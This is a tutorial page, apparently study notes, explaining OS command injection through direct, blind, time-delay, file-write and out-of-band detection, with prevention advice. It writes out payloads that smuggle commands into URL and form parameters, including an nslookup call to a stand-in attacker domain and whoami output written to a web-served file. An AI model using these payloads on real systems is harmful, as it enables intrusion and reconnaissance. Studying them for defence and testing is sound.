Os Command Injection

What is OS Command Injection?

OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into a vulnerable application. This occurs when user input is passed to a shell command without sufficient sanitization.

How It Works

The attacker manipulates user input to inject malicious commands. For example:

  1. Input is included in a backend command such as:

    stockreport.pl 432 32

  2. Malicious input like 432 & echo hello & modifies the command:

    stockreport.pl 432 & echo hello & 32

    This causes the shell to execute echo hello alongside the intended command.

Types of OS Command Injection

1. Direct Injection

The output of the injected command is visible in the application response. Example:

https://insecure-website.com/stockStatus?productID=& echo hello &

If the response includes hello, the injection is successful.

2. Blind Injection

The output of the injected command is not visible in the response. Various techniques can be used to confirm execution:

  • Timing Attacks:

    • Inject a time delay to observe the response time.

      https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &

  • File Writing:

    • Write command output to a file accessible via the web.

      https://vulnerable-website.com/stockStatus?productID=& whoami > /var/www/static/whoami.txt &

  • Out-of-Band Interaction:

    • Trigger DNS lookups or HTTP requests to an attacker-controlled server.

      https://vulnerable-website.com/stockStatus?productID=& nslookup attacker-domain.com &

Injection Characters

The following characters can be used to inject commands:

Character

Usage

&

Execute multiple commands sequentially.

&&

Execute the next command only if the previous one succeeds.

;

Separate multiple commands.

Newline ()

Separate commands (Unix-specific).

Bash-Specific Characters:

  • ` (Backticks): Execute commands within the backticks.

  • $() (Subshell): Execute commands within the parentheses.

Examples of OS Command Injection

Exploiting GET Parameters

  1. Echo Command Injection:

    https://insecure-website.com/stockStatus?productID=& echo hello &

  2. Timing-Based Blind Injection:

    https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &

Exploiting POST Parameters

  1. Inject Commands into Form Fields:

    POST /submit-form HTTP/1.1
csrf=token&name=test&email=test@example.com & sleep 10 #&subject=Testing

  2. Redirect Output:

    & whoami > /var/www/static/whoami.txt &

Useful Commands for Testing

Purpose

Linux Command

Windows Command

Current user

whoami

whoami

Operating system

uname -a

ver

Network configuration

ifconfig

ipconfig /all

Open network connections

netstat -an

netstat -an

Running processes

ps -ef

tasklist

Advanced Techniques

Using Time Delays

Inject a delay to observe execution:

& sleep 10 &

Redirecting Output

Write command output to a file accessible via the web:

& whoami > /var/www/static/whoami.txt &

Out-of-Band Interaction

Trigger DNS or HTTP requests to an attacker-controlled server:

& nslookup attacker-domain.com &

How to Prevent OS Command Injection

  1. Avoid Shell Commands:

    • Avoid passing user input to shell commands.

    • Use high-level APIs or libraries to handle tasks like file operations or process management.

  2. Validate User Input:

    • Use a safelist to restrict allowed characters and commands.

    • Block special characters like &, |, ;, and `.

  3. Sanitize Input:

    • Use escaping techniques appropriate to the shell environment.

  4. Use Strong Permissions:

    • Limit the application's ability to execute shell commands or access sensitive files.

  5. Employ Security Measures:

    • Use Web Application Firewalls (WAFs) to block malicious requests.

PreviousBroken brute-force protection, multiple credentials per requestNextOS command injection, simple case

Last updated

Was this helpful?